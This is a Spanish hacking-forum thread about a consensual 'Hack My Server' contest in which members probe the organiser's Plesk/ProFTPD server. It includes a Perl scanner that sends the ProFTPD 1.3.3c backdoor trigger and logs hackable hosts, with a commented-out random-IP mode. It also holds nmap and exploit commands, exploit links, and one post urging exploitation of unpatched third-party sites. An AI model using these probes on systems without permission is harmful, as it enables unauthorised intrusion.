Pero el problema es que en ningún sitio encuentro realmente en que consiste realmente el fallo, lo único que hay es esto http://www.exploit-db.com/exploits/15313/, pero se trata de un parallels plesk sobre Windows. He tratado de reproducir las peticiones que hace el fulano pero no hay manera de obtener ni siquiera un simple error.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 2 Mayo 2012, 15:24 pm
Yo estoy preparando todo tipo de cosas para probarlas en cuanto dimitrix me pase su IP xD
¿Me la pasas por favor? Así comenzaré a probar :P

Saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:26 pm
Yo creo que el punto más débil como habéis comentado es el panel de parallels, esta vulnerabilidad http://kb.parallels.com/en/113313. Con lo que en teoría se podría entrar por ahí.

Pero el problema es que en ningún sitio encuentro realmente en que consiste realmente el fallo, lo único que hay es esto http://www.exploit-db.com/exploits/15313/, pero se trata de un parallels plesk sobre Windows. He tratado de reproducir las peticiones que hace el fulano pero no hay manera de obtener ni siquiera un simple error.

El problema es que con un SQLi tendrás que escalar mucho, pero puede funcionar.

Yo estoy preparando todo tipo de cosas para probarlas en cuanto dimitrix me pase su IP xD
¿Me la pasas por favor? Así comenzaré a probar :P

Saludos

No tengo ningún MP tuyo, pero ya te lo he enviado :-P


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: [u]nsigned en 2 Mayo 2012, 15:40 pm
Me apunto.

Por otro lado, y no es por tirar malas onda, pero si es un VPS contratado, con plesk y toda la cosa, seguramente este actualizado y bien configurado. Cada VPS nuevo que una empresa alquila no es ams que una copia de una 'imagen' virtual preconfigurada, y dicha empresa depende totalmente de que sus productos sean muy seguros. Es decir, es muyy difcil que un servicio de pago no brinde la mayor seguridad posible y actualizaciones mas recientes de su software...  :silbar:

Asi que basicamente estariamos auditando gratis xD

Saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h3ct0r en 2 Mayo 2012, 15:44 pm
Mejor aun para testear nosotros, si logramos entrar a un servidor actualizado y en "produccion" es muchisimo mas interesante y divertido. Si no logramos entrar, pues bueno... A seguir estudiando!  :P

Hay que verle el lado positivo a todo!

Estoy revisando esas sqlinjection y hasta ahora nada, voy a instalar ese plesk aqui local para probar, cualquier novedad la posteo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:49 pm
Me apunto.

Por otro lado, y no es por tirar malas onda, pero si es un VPS contratado, con plesk y toda la cosa, seguramente este actualizado y bien configurado. Cada VPS nuevo que una empresa alquila no es ams que una copia de una 'imagen' virtual preconfigurada, y dicha empresa depende totalmente de que sus productos sean muy seguros. Es decir, es muyy difcil que un servicio de pago no brinde la mayor seguridad posible y actualizaciones mas recientes de su software...  :silbar:

Asi que basicamente estariamos auditando gratis xD

Saludos

No lo veo cierto de todo, en un VPS/Servidor no administrado la seguridad corre de tu parte.

Además que una se monta el servidor ellos no actualizan el VPS, lo máximo que hacen es una vez al mes enviarte instrucciones de como arreglar los nuevos bugs que han salido, pero ellos no lo arreglan ni lo tocan.

Por otra si el día 15 nadie ha conseguido algo, intalaré aplicaciones 'corrientes' pero que sepa que tienen vulnerabilidades.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:50 pm
Ahhh a todo esto, las versiones que están instaladas ya son viejas, no son las más actuales.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 2 Mayo 2012, 16:34 pm
Bueno leyendo y consultando con nuestro amigo google el proftpd 1.3.3c si las configuraciones están por defecto será dificil romper, ya que lo único que encontre solo funciona si tiene el mod_sql instalado y funcionando y por defecto no es así.
Asi que tendremos que centrarnos en el plesk y/o en otros servicios....


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 2 Mayo 2012, 18:38 pm
el servicio  proftpd que esta instalado no es vulnerable.
Podéis probarlo con el script "bitchscan.pl" o directamente desde el modulo de metasploit "exploit/unix/ftp/proftpd_133c_backdoor"


Para los que querais probar el script, pongo el código
en la linea
$ip = "x.x.x.x";
poner la dirección que os han enviado por correo, el script encuentra que el servicio tiene la versión que es vulnerable, pero después de ejecutar, no es posible establecer el backdoor, indicando que el servicio no es "hackeable".

Código:
#!/usr/bin/perl
use IO::Socket;
## IP GENERATOR ##
print "\n! ProScan - Started !\n";

sub ipgen(){
my $range1 = 223;        #avoid experimental and multicast
my $range2 = 240;               
$oct1 = int(rand($range1)) + 1;        #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();        #if local or private call again
}else{
#$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
$ip = "x.x.x.x";
}
return $ip;        #return to caller       
}
##
## MAIN ##
while(1==1){        # keeps code running indefinatly
$target = &ipgen();        # get random ip to scan
print "SCANNING: $target \n";        # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '21',     
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 3 to be safe
                 );
if($sock){        # if socket opened (port open)

sysread($sock,$buf,1024);        # readheader - may need to make the buffer size 4096 instead of 1024
print "FTP SUCCESS: $target \n";                # print to screen
if ($buf =~ m/ProFTPD 1.3.3c/){
  print "\n!!Proftpd 1.3.3c Found!!\n";
  print $sock "HELP ACIDBITCHEZ\n";
  sysread($sock,$buf,1024);
  if ($buf =~ m/502/){
print "\n NOT HACKABLE \n";
  }else{
    print $buf;
  print "\n\n HACKABLE BOX FOUND \n\n";
          open (MYFILE, '>>proftpd_1.3.3c-exploitable.txt');
          print MYFILE "Proftp Found: $target :$buf\n";
  close(MYFILE);
}

}
}
close($sock);        # close the socket
}##


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Once en 2 Mayo 2012, 19:07 pm
Incluso con nmap:

Código:
nmap --script=ftp-proftpd-backdoor.nse <ip> <puerto>

Saldos!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 2 Mayo 2012, 19:19 pm
Por fin pude!!!!





No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 19:27 pm
Por fin pude!!!!
No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/

Todo servidor es hackeable, hace falta encontrar la vulnerabilidad.

El servidor no tiene ni firewall ni nada, no obstante si el día 15 (o mejor el 7) nadie consigue nada, iré bajando la seguridad.



Estoy pensando que por ahora la seguridad perimetral es quizás muy difícil para casi todos por lo que el mes que viene haré.
- Hack My Server: Joomla
- Hack My Server: WP


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: lokitorz en 2 Mayo 2012, 20:02 pm
Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: josezoft en 2 Mayo 2012, 21:25 pm
Me puedes pasar la ip por privado :)

Saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 2 Mayo 2012, 23:14 pm
Hola señores, todavia no he mirado nada de esto, se sabe si hay alguna cuenta en el FTP? Buscando por la red encontre una vulnerabilidad para las versiones inferiores a la 1.3.3g. La vulnerabilidad se basa en enviar un comando inexistente o erroneo al servidor mientras se esta descargando o subiendo un archivo. La vulnerabilidad permitiria inyectar cogido arbitrario.

http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html (http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html)

En ese link creado por mi teneis los scripts pero para uso local y necesitamos alguien con conocimientos en python para que lo pase a remoto, yo lo he intentado pero no tengo ni idea de python si alguien sabe que ponga la respuesta en el link. Un saludo y suerte.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h1t en 2 Mayo 2012, 23:18 pm
Hola buenas después de mirar la información de dimitrix sobre los servicios del server, voy a probar el siguiente:
Servicio
22/tcp   open     ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)

voy a investigar un poco más sobre eso y a ver que sale.



: )


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: pajaras en 3 Mayo 2012, 00:04 am
me puedes enviar la IP?
mercii!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: peib0l en 3 Mayo 2012, 00:22 am
quiero la ip ... manda-mela a @elhacker

me la suda el server yo solo quiero la cerveza, y lo sabes  :xD :xD soy un borracho jajaja


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: kub0x en 3 Mayo 2012, 01:10 am
Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.

Estuve escaneando de todo ayer, y me vino a la cabeza esta vulnerabilidad. Encontré un exploit pero es para BSD. Como no entiendo asm no sé como establecer la dirección de la pila correctamente por lo que me quedo sin probarlo :/

Por lo demás estoy como vosotros, he probado exploit por ftp, pop, imap y sigo a dos velas, aun así seguiré investigando :D

Saludos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 3 Mayo 2012, 01:13 am
Si vemos que no lo conseguimos, instalo más aplicaciones y modifico otras para que sea vulnerable.

La que ya tengo vista es instalar la de proFTP la vulnerable, que tengo ganas de practicar^^


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 3 Mayo 2012, 01:33 am
Si vemos que no lo conseguimos, instalo más aplicaciones y modifico otras para que sea vulnerable.

La que ya tengo vista es instalar la de proFTP la vulnerable, que tengo ganas de practicar^^

Una idea que se me pasa por la cabeza es que también se podría poner alguna aplicación web vulnerable, desde ella se podría subir una shell(php por ejemplo) y una vez conseguido esto ganar privilegios de root con algún exploit que solo sea local.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 3 Mayo 2012, 02:25 am
Breixo eso ya lo comenté. Esa es la idea del concurso nº2 y nº3.

Atacar webs con Joomla o WP y ciertos módulos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 3 Mayo 2012, 02:49 am
hola

pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto

dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit

tambien al rato posteo ese exploit, salu2


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 3 Mayo 2012, 02:56 am
Breixo eso ya lo comenté. Esa es la idea del concurso nº2 y nº3.

Atacar webs con Joomla o WP y ciertos módulos.

ok, no me fijara en el mensaje.  :D


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 3 Mayo 2012, 03:18 am
Vale, saco estos datos:
Ubuntu 10.04 LTS + Plesk 10.2

Creo que se puede atacar con esto:
php -d safe_mode=0 plesk_remote_vulnerability_checker.php

hola

pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto

dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit

tambien al rato posteo ese exploit, salu2

Parece que no está modificado.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 3 Mayo 2012, 04:53 am
que mala suerte, bueno pues mañana lo intentare de nuevo, tampoco pude con ProFTPD, metasploit no pudo

estos son los exploits con los que intente

http://securityvulns.ru/files/sm00ny-courier_imap_fsx.c

http://old.honeynet.org/papers/enemy/imapd_exploit.txt

salu2


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 3 Mayo 2012, 04:58 am
dimitrix porfavor mandame la ip del servidor por mp


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 3 Mayo 2012, 04:58 am
al parecer plesk tiene un fallo en Agent.php, pero lamentablemente casi no se mucho sobre SQLi, tratare de buscar como lograrlo, ya que ayer fue lo primero que encontre sobre subir privilegios... pero por lo mismo que no se mucho sobre eso, lo quise dejar para despues e intentar con exploits, pero lo hare a ver que puedo encontrar

salu2


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jnet en 3 Mayo 2012, 08:14 am
Hola a tod@s!

Estoy de baja en casa y, sinceramente, hace mucho que no trasteo. Mis noches interminables detrás de una consola quedan muy atrás y me gustaría recordar y evolucionar un poco. ¿Cómo puedo participar? ¿A quien le pido la IP del servidor?

Gracias!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jnet en 3 Mayo 2012, 08:32 am
Hola a tod@s!

Estoy de baja en casa y, sinceramente, hace mucho que no trasteo. Mis noches interminables detrás de una consola quedan muy atrás y me gustaría recordar y evolucionar un poco. ¿Cómo puedo participar? ¿A quien le pido la IP del servidor?

Gracias!

Ya, ya la he pedido, me faltaba leer un poco más.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: brujo29 en 3 Mayo 2012, 14:43 pm
Nos tenemos k esconder nuestra direccion ip?

Gracias
Salu2


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 3 Mayo 2012, 19:46 pm
Nos tenemos k esconder nuestra direccion ip?

Gracias
Salu2

Evidentemente es indiferente ya que es una cosa organizada y legal.



Bueno, a lo que iba.

CVE-2011-4130, es vulnerable hasta la 1.3.3g diria

Si hacéis el exploit para este bug podreis compromenter todos los proftpd excepto los 1.3.4 y el 1.3.3g. Este es el c.

Pues nada yo tengo el server 1.3.3c bajado que le estuve echando un ojo. Lo probare con ubuntu 10.04 lts ya que dimitrix se ha tomado la molestia de comentarlo.

Lo comento porque la naturaleza del concurso es ir poniendo el desarrollo o en que estamos trabajando.

Realmente el exploit si que existe pero es de pago o solo para organizaciones que se dedican a la seguridad o gobiernos.

Bueno ya os comento si avanzo.

Saludos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 3 Mayo 2012, 20:08 pm
Evidentemente es indiferente ya que es una cosa organizada y legal.



Bueno, a lo que iba.

CVE-2011-4130, es vulnerable hasta la 1.3.3g diria

Si hacéis el exploit para este bug podreis compromenter todos los proftpd excepto los 1.3.4 y el 1.3.3g. Este es el c.

Pues nada yo tengo el server 1.3.3c bajado que le estuve echando un ojo. Lo probare con ubuntu 10.04 lts ya que dimitrix se ha tomado la molestia de comentarlo.

Lo comento porque la naturaleza del concurso es ir poniendo el desarrollo o en que estamos trabajando.

Realmente el exploit si que existe pero es de pago o solo para organizaciones que se dedican a la seguridad o gobiernos.

Bueno ya os comento si avanzo.

Saludos.

Saludos morf en la pagina anterior de este mismo post hay un mensaje mio diciendo lo mismo pero no he tenido tiempo para probarla, http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html (http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html)

En ese enlace tienes los 2 scripts para probar la vulnerabilidad, son para modo local y necesitas una cuenta y un archivo que descargar tenlo en cuenta. Pruebalo y nos comentas. Un saludo!

Se me olvidaba, el comando falso "WXYZ 0wn3d" debe ir así "WXYZ *0wn3d/"

Si quereis un analisis completo de esta vulnerabilidad aqui teneis: http://blog.buguroo.com/?p=3951 (http://blog.buguroo.com/?p=3951)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 3 Mayo 2012, 20:24 pm
En efecto... Esta web http://blog.buguroo.com/?p=3951 ya la habia visto.... pero en nuestro caso no nos funcionaria por que no tenemos cuenta para identificarnos como usuario en proftpd... Por lo tanto no podemos usar esa vulnerabilidad....
Había otra tambien pero necesita tener cargado el mod_sql.... que tampoco viene de serie....


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 3 Mayo 2012, 20:30 pm
Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.

Fuck no leí lo de authenticated T.T'

Gracias Xenomorfo77 por evitarme perder como media hora de mi vida xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 3 Mayo 2012, 20:56 pm
Seria muy interesante saber explotar esta vulnerabilidad ya que aunque no nos sirva para este caso, hay muchisimos hosts con una version inferior, que seria vulnerable, lo malo es que si lo descubrimos y posteamos aqui puede haber algun usuario malintencionado que se dedique a reventar todo lo que pille :S .Si no conseguimos nada pues se podria crear un usuario y probarla ya que dimitrix tiene acceso. Un saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jma1e en 3 Mayo 2012, 21:24 pm
Hola!

Nuevo escribiendo en el foro, aunque lo sigo desde hace tiempo. La verdad es que me gustaría poder jugar un poco con esto :D

¿Alguien me puede dar la ip?

Thanks ;)!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 4 Mayo 2012, 01:42 am
Creo que con Shadow Security Scan se pueden ver las Vulnerabilidades de un server :o


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 4 Mayo 2012, 01:57 am
Creo que con Shadow Security Scan se pueden ver las Vulnerabilidades de un server :o

Lógico, para eso sirve un escaner de vulnerabilidades. Te recomiendo que te mires otro escaner, ya que ese es un poco para novatos y no me convence demasiado. Yo utilizo nessus integrado en metaexploit framework con backtrack 5. Es fácil de instalar y usar te recomiendo que le eches un vistazo. Si no también tienes OpenVas, NeXpose y un largo etcétera. Saludos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 4 Mayo 2012, 02:21 am
Gracias Xenomorfo77 tambien tengo NeXpose pero me parecio mejor el SSS despues pruebo y comento.
 ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 4 Mayo 2012, 04:18 am
Por el proftp no se puede acceder porque no hay una cuenta creada  :-\


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 4 Mayo 2012, 11:51 am
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 4 Mayo 2012, 12:05 pm
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?

Probar a ver si tiene esta vulnerabilidad: http://blog.buguroo.com/?p=3951


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 4 Mayo 2012, 14:21 pm
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?

Sabemos que es una vulnerabilidad y como se prueba. Pero a la hora de obtener resultados que nos valgan para algo ni idea. He contactado con el creador del articulo este del blog y estoy esperando respuesta para ver si escribe el articulo 2 explicando como explotar esta vulnerabilidad. En cuanto sepa algo os comento. Un saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 4 Mayo 2012, 14:40 pm
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?

http://pastebin.com/Uuk9LwjN
http://pastebin.com/iJAFCd8e

Si he entendido bien estos dos scripts son para generar la excepción, pero no carga la shell ni nada.

Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?

Depende del nivell que hay supongo.

Por si acaso voy ha hacer un curso acelerado de python, que es parecido a perl que si controlo algo más.

Ya nos diras si nos das cuenta de ftp.

Bueno yo tengo la cuenta de un usuario del plesk, si consigo entrar probare los sqli. La cosa es que necesitare un xss o sqli en el panel de entrada para conseguir el passwd sin fuerza bruta.

No he mirado si alguno de los xss persistentes que vi por encima se referían alguno al script de login. Y el script de login tampoco he comprobado si lo ha modificado el administrador del server.

A ver que se puede encontrar más.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 4 Mayo 2012, 17:42 pm
Vale, pues seguimos sin modificar nada del servidor...

Calendario:
07/05/2012 - Publicaré una cuenta FTP
15/05/2012 - Instalaré la versión vulnerable de ProFTP
22/05/2012 - Daré la cuenta de Plesk para probar vulnerabilidades.



Además, seguramente una empresa conocida* patrocine todo esto y podamos realizar diferentes Hacks simultaneos y con diferentes versiones de SO, etc...

La cuestión sería montar una web o un foro donde ir publicando todo...

*Conocida por mi xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 5 Mayo 2012, 03:35 am
Probar a ver si tiene esta vulnerabilidad: http://blog.buguroo.com/?p=3951

esa Vulnerabilidad solo sirve en proFTPd 1.3.3g o 1.3.3 y este server tiene 1.3.3c
 :(


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 5 Mayo 2012, 03:44 am
esa Vulnerabilidad solo sirve en proFTPd 1.3.3g o 1.3.3 y este server tiene 1.3.3c
 :(

Intenta informarte antes de decir algo que es incierto, la vulnerabilidad se corrige en la version 1.3.3g y afecta a todas las versiones ANTERIORES. Un saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 5 Mayo 2012, 03:46 am
Intenta informarte antes de decir algo que es incierto, la vulnerabilidad se corrige en la version 1.3.3g y afecta a todas las versiones ANTERIORES. Un saludo.

Para que lo sepas para otra vez el símbolo "<" significa "menor que". Mira el blog y verás como pone < 1.3.3g


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 5 Mayo 2012, 04:03 am
El servidor no tiene esta vulnerabilidad pero por si a alguien le interesa se ha descubierto una vulnerabilidad el 3 de mayo para las versiones de PHP superiores a 5.3.12 y 5.4.2 dejo mas informacion y el exploit en este link http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html (http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html)

Todavia estan desarrollando el parche asi que hay que aprovechar ahora que se puede xD. Un saludo a todos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 5 Mayo 2012, 04:08 am
El servidor no tiene esta vulnerabilidad pero por si a alguien le interesa se ha descubierto una vulnerabilidad el 3 de mayo para las versiones de PHP superiores a 5.3.12 y 5.4.2 dejo mas informacion y el exploit en este link http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html (http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html)

Todavia estan desarrollando el parche asi que hay que aprovechar ahora que se puede xD. Un saludo a todos.

Lo siento me he equivocado en la fecha :S era del 23 de febrero y ya existe el parche pero puede haber muchos sitios sin actualizarse :)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 5 Mayo 2012, 04:25 am
Intenta informarte antes de decir algo que es incierto Un saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Pancho.- en 5 Mayo 2012, 05:15 am
Muy buen concurso para aprender , me apunto! ;D


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Morets en 5 Mayo 2012, 15:14 pm
Hola, soy nuevo por aquí, me acabo de registrar y la verdad es que estoy asombrado porque mi intención es la de aprender un poco de este campo informático (hacking). No soy muy bueno, pero por ganas no será...Espero contestación de alguien, aunque sólo sea para saludar..muchas gracias peña!! saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Pancho.- en 5 Mayo 2012, 23:30 pm
Me mandas la ip por mp


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Pancho.- en 5 Mayo 2012, 23:37 pm
Se puede usar medusa  :huh:


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 5 Mayo 2012, 23:53 pm
No brute force...
http://www.rinconinformatico.net/ataque-de-fuerza-bruta-con-diccionario-usando-medusa


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: k00b0rp en 6 Mayo 2012, 06:36 am
IP? Gracias.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Pancho.- en 6 Mayo 2012, 07:02 am
IPIP :huh:


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: pwnz en 6 Mayo 2012, 11:16 am
Tenéis que pedirla al creador del post.

Amí por ahora no se me ocurre nada  :silbar: aver si lo intentan los que controlan más del tema y nos enseñan a los demás xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 6 Mayo 2012, 15:38 pm
Acabo de hacer una puntuación del personal, podeis ver los puntos en el primer mensaje.

Esto se hace por si nadie consigue acceder al servidor como Root pensarme si envío la cerveza.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 6 Mayo 2012, 16:19 pm
Acabo de hacer una puntuación del personal, podeis ver los puntos en el primer mensaje.

Esto se hace por si nadie consigue acceder al servidor como Root pensarme si envío la cerveza.

La cerveza la conocías o la sacaste del otro post?



Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 6 Mayo 2012, 16:22 pm
La cerveza la conocías o la sacaste del otro post?

El del otro post soy yo así que no hay diferencia, la conocía, la conozco y la he catado un par de veces xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 6 Mayo 2012, 16:29 pm
La cerveza la conocías o la sacaste del otro post?

El del otro post soy yo así que no hay diferencia, la conocía, la conozco y la he catado un par de veces xD

A ver si me explico, tu dijiste lo de el ganador se llevara 3 cervezas de la marca hacker.

Yo unos comentarios más adelante pongo la imagen porque busque si existia alguna marca de cervezas que se llamara hacker.

Lo que te preguntaba era si ya la conocias o la sacaste de la imagen, pero ya veo que la conocias.

Nada solo era por curiosidad, yo no la he probado solo puse la imagen.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 6 Mayo 2012, 16:32 pm
Ahhh que va, que va, ya la conocía, te puedo contar la historia y todo hehehe...

Uno de mis proyectos 'personales' era junto a un amigo hacer uan web de cervezas (opiniones) e ir bebiendo una por una... xDD

Y dije que eran 3 cervezas puesto que existen tres variedades de HACKER PSCHORR (principalmente, en realizad hay 5 o 6), con mayor fermentación, con más trigo, etc...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 7 Mayo 2012, 03:32 am
He encontrado una vulnerabilidad para SMTP Postfix pero no se que version es la que tiene instalado el servidor y ademas no entendi muy bien como explotarla si alguien le echa un vistazo y lo entiende se agradeceria que lo explicara aca esta la info http://www.kb.cert.org/vuls/id/727230 y he visto algo por aca pero no se si funcionara


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dutch en 7 Mayo 2012, 03:38 am
Dando los primeros Pasos... buscando gargamel...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 7 Mayo 2012, 05:09 am
parallels plesk panel 10.2.0 CVE-2011-4734

http://cert.inteco.es/vulnDetail/Actualidad_fr/Actualite_Vulnerabilites/detalle_vulnerabilidad_fr/CVE-2011-4734

http://xx.xxx.xxx.xxx:8443/login_up.php3/

alguien sabe como explotar esa Vulnerabilidad?????


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: kasiko en 7 Mayo 2012, 11:21 am
hola,

¿cual es la direccion del servidor?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: tremolero en 7 Mayo 2012, 12:58 pm
Bufff... hola a todos jejeje... voy a mandar el privado a dimitrix para la ip, que aunque no tengo npi xD, nunca hay que infravalorarse y tal vez pueda ayudar algo, que mas bien me ayudareis vosotros jajaja....

Un saludo

pd: en 7 dias esto tiene ya mas paginas que la biblia xD menos mal que me las he leido ya xDD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 7 Mayo 2012, 13:41 pm
parallels plesk panel 10.2.0 CVE-2011-4734

http://cert.inteco.es/vulnDetail/Actualidad_fr/Actualite_Vulnerabilites/detalle_vulnerabilidad_fr/CVE-2011-4734

http://xx.xxx.xxx.xxx:8443/login_up.php3/

alguien sabe como explotar esa Vulnerabilidad?????

Consiste en qu elo hags usted mismo, no que te lo hagan los demás.  :D :D :D :D


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 7 Mayo 2012, 14:09 pm
parallels plesk panel 10.2.0 CVE-2011-4734

http://cert.inteco.es/vulnDetail/Actualidad_fr/Actualite_Vulnerabilites/detalle_vulnerabilidad_fr/CVE-2011-4734

http://xx.xxx.xxx.xxx:8443/login_up.php3/

alguien sabe como explotar esa Vulnerabilidad?????

Probadas, Al parecer esta parcheado y no es vulnerable.  ;D
No es tan sencillo acceder a este servidor, sin embargo, creo que hay más "luz" en los servicios popd e imapd dado que se trata de versiones muy antiguas... Tambien realizaré algunas pruebas contra el servicio de base de datos que esta instalado (mysql por el puerto 3306).


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 7 Mayo 2012, 15:41 pm
adastra te subo unos puntos si indicas como las probaste :-)

Yo esta mañana miré 5 minutos en la oficina por que no tenía más tiempo y no encontré dodne decía que fue vulnerable esa versión.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 7 Mayo 2012, 16:44 pm
En realidad me ha faltado ser más especifico (y más claro) en mi mensaje  :xD os comento.

Las vulnerabilidades de SQLi sobre Plesk que se han comentado afectan al Control Panel de Plesk, no afectan al mecanismo de autenticación o la parte pública del gestor, de todos modos he ejecutado las pruebas de SQLi estandar contra el formulario de autenticación (sin exito), en concreto, algunas han sido:

